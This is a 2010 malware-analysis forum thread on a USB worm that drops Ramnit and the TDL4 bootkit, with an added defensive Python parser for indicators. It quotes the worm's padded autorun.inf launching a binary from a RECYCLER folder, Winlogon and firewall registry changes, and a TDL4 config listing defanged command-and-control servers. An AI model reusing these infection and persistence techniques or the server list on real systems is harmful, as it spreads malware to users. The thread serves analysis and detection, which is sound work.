A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #3855  by wealllbe20
 Mon Dec 06, 2010 5:34 pm
Creates a .cpl and an .exe file on the USB stick, in the RECYCLER\(SID) folder of the USB stick.

The autorun.inf has a bunch of what appears to be garbage data.

Inside the autorun.inf is hidden:

oFZNCPaKpFqnypMvunsJAUxaulHmNGcfpxcxQWpTWyPLPRKSQjsQhufI
QoxPwiaWhAexFmbQfCMkhSKPqerQopYyGAhHorvIPPREcrSUnACLyfRtyQaRqI
srGYVFTeEeNyyeKVSICYaVrwxoLRvgTMtsPfDoSIjdpqmZkLAgKdU
UePqxwFZoNubGgTFYLfpmYELeDkWsNVeXnGdjUObhqyrhMAErRqscxkakCplNWQhBFZOGgh
aYvQfnbdwreDkCxhnEyhplBaADYULsoWuGegXGgjuJtZXwBqb
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
shell\explore\command=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
kTxSrBsVFIdVCQrfZDDOqweGuedBBMtoIaoWovaKaqPduMpQFmNBKQyDFYBJoicxILbnC
wNCJnZlQQwmhfEvOijCDKYOBrDOcEpyMsCbpBcRSVISXJpepadpsLjVimAIXFcytgSUmoOEyAPSrCaXOcpibyix

Also infects C:\Program Files and the current user's Startup folder.
Attachments: password "infected" (78.88 KiB)
 #3858  by Meriadoc
 Tue Dec 07, 2010 1:50 am
Thanks. Creates Win32.Ramnit + TDL4.03; MBR infected, but then I receive a STOP: unknown hard error.

Edit:

Modifies the registry key HKEY_LOCAL_MACHINE\software\microsoft\windows NT\currentVersion\Winlogon\UserInit from (C:\WINDOWS\system32\userinit.exe,)
to <C:\WINDOWS\system32\userinit.exe,,C:\Program Files\McXQeAiBþ¯¸•Ëvpjtxjct.exe\vpjtxjct.exe>

Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Internet Explorer\IEXPLORE.EXE
is set to <C:\Program Files\Internet Explorer\IEXPLORE.EXE:*:Enabled:Internet Explorer>

Creates C:\Documents and Settings\user\Start Menu\Programs\Startup\vpjtxjct.exe

Process: IEXPLORE.EXE

Infects the MBR with a bootkit.

TDL 4.03
[main]
version=0.03
aid=40592
sid=0
rnd=1757981266
knt=1291690128
[inject]
*=cmd.dll
* (x64)=cmd64.dll
[cmd]
srv=hxxps://zz87lhfda88.com/;hxxps://01n02n4cx00.com/;hxxps://1l1i16b0.com/;hxxps://zz87ihfda88.com/;hxxps://10n02n4cx00.com/
wsrv=hxxp://pxlaratotor.com/;hxxp://aurelenopkin.com/;hxxp://teiretorkei.com/;hxxp://backlistcheck.com/;hxxp://cilkcpixleabn.com/
psrv=hxxp://advcpworld.com/
version=0.15
bsh=c388ec50962a4978a3cdb1cef1c864884e520578
delay=7200
csrv=hxxp://z0g7yail0.com/
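As an added example (not code from either poster), the script below parses the two artefacts quoted in this thread from a defender's side: it reads a padded autorun.inf of the kind shown in #3855 and reports launch keys that point into a recycle-bin folder, and it pulls the server hostnames out of the [cmd] section of a TDL4-style config like the one in this post. Both samples are constructed inline from the text above. The RECYCLED and $RECYCLE.BIN folder names are assumed equivalents of the RECYCLER name the thread shows; the key names and the hxxp defanging are taken from the thread itself.

```python
import re
from typing import Dict, List, Tuple

# Constructed from the autorun.inf quoted in #3855: junk padding lines
# surround the real [autorun] section, so a strict INI parser would choke.
AUTORUN_SAMPLE = r"""oFZNCPaKpFqnypMvunsJAUxaulHmNGcfpxcxQWpTWyPLPRKSQjsQhufI
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
shell\explore\command=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
kTxSrBsVFIdVCQrfZDDOqweGuedBBMtoIaoWovaKaqPduMpQFmNBKQyDFYBJoicxILbnC
"""

# Constructed from the TDL 4.03 config quoted in #3858 (already defanged).
TDL_CONFIG_SAMPLE = """[main]
version=0.03
aid=40592
sid=0
[inject]
*=cmd.dll
* (x64)=cmd64.dll
[cmd]
srv=hxxps://zz87lhfda88.com/;hxxps://01n02n4cx00.com/;hxxps://1l1i16b0.com/;hxxps://zz87ihfda88.com/;hxxps://10n02n4cx00.com/
wsrv=hxxp://pxlaratotor.com/;hxxp://aurelenopkin.com/;hxxp://teiretorkei.com/;hxxp://backlistcheck.com/;hxxp://cilkcpixleabn.com/
psrv=hxxp://advcpworld.com/
version=0.15
bsh=c388ec50962a4978a3cdb1cef1c864884e520578
delay=7200
csrv=hxxp://z0g7yail0.com/
"""

# autorun.inf keys that make Explorer launch something: the two direct launch
# keys plus any shell\<verb>\command context-menu verb.
_LAUNCH_KEYS = {"open", "shellexecute"}
_VERB_COMMAND = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)
# RECYCLER is what the thread shows; RECYCLED and $RECYCLE.BIN are assumed
# equivalents on other Windows versions.
_RECYCLE_DIRS = re.compile(r"(?:^|\\)(?:RECYCLER|RECYCLED|\$RECYCLE\.BIN)\\", re.IGNORECASE)
_SERVER_KEYS = {"srv", "wsrv", "psrv", "csrv"}
# Accepts real (http/https) and defanged (hxxp/hxxps) schemes, captures the host.
_URL = re.compile(r"^(?:h[tx]{2}ps?)://([^/:;]+)", re.IGNORECASE)


def parse_loose_ini(text: str) -> Tuple[Dict[str, List[Tuple[str, str]]], int]:
    """INI-style parser that tolerates what configparser rejects.

    Lines before any section, lines without '=', and duplicate keys are all
    accepted; junk lines are counted instead of raising. Section names are
    lower-cased, keys keep their case so the original spelling can be reported.
    Returns (sections, junk_line_count).
    """
    sections: Dict[str, List[Tuple[str, str]]] = {}
    current = None
    junk = 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
            continue
        key, sep, value = line.partition("=")
        if current is None or not sep:
            junk += 1          # padding/obfuscation outside the real config
            continue
        sections[current].append((key.strip(), value.strip()))
    return sections, junk


def autorun_findings(text: str) -> List[str]:
    """Return human-readable findings for an autorun.inf; empty when nothing is flagged."""
    sections, junk = parse_loose_ini(text)
    findings: List[str] = []
    if junk:
        findings.append(f"{junk} junk line(s) outside any section (padding/obfuscation)")
    for key, value in sections.get("autorun", []):
        if key.lower() not in _LAUNCH_KEYS and not _VERB_COMMAND.match(key):
            continue
        if _RECYCLE_DIRS.search(value):
            findings.append(f"{key} launches a binary hidden in a recycle-bin folder: {value}")
        elif value.lower().endswith((".exe", ".cpl", ".scr", ".com")):
            findings.append(f"{key} launches an executable from the drive: {value}")
    return findings


def tdl_server_hosts(text: str) -> List[Tuple[str, str]]:
    """Extract (key, hostname) pairs from the [cmd] section of a TDL4-style config."""
    sections, _ = parse_loose_ini(text)
    hosts: List[Tuple[str, str]] = []
    for key, value in sections.get("cmd", []):
        if key.lower() not in _SERVER_KEYS:
            continue
        for url in value.split(";"):
            m = _URL.match(url.strip())
            if m:
                hosts.append((key.lower(), m.group(1).lower()))
    return hosts


if __name__ == "__main__":
    for line in autorun_findings(AUTORUN_SAMPLE):
        print("autorun.inf:", line)
    for key, host in tdl_server_hosts(TDL_CONFIG_SAMPLE):
        print(f"tdl [{key}] {host}")
```

The parser deliberately keeps duplicate keys (three launch keys point at the same binary here) and counts rather than rejects the junk lines, since those are exactly the two properties of this autorun.inf that configparser would refuse to load. The extracted hostnames are what you would feed into a blocklist or a DNS log search.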
 #3867  by wealllbe20
 Tue Dec 07, 2010 4:56 pm
http://virscan.org/report/d1df877dbe44d ... 9f519.html

Infects autorun.inf

Appears to create a long random file name on the USB drive.

Also puts itself in %appdata%\bdepdf.exe so it can infect other USB drives... That is all I could find; sandboxed software doesn't appear to show much on this malware.
Attachments: password "infected" (176.49 KiB)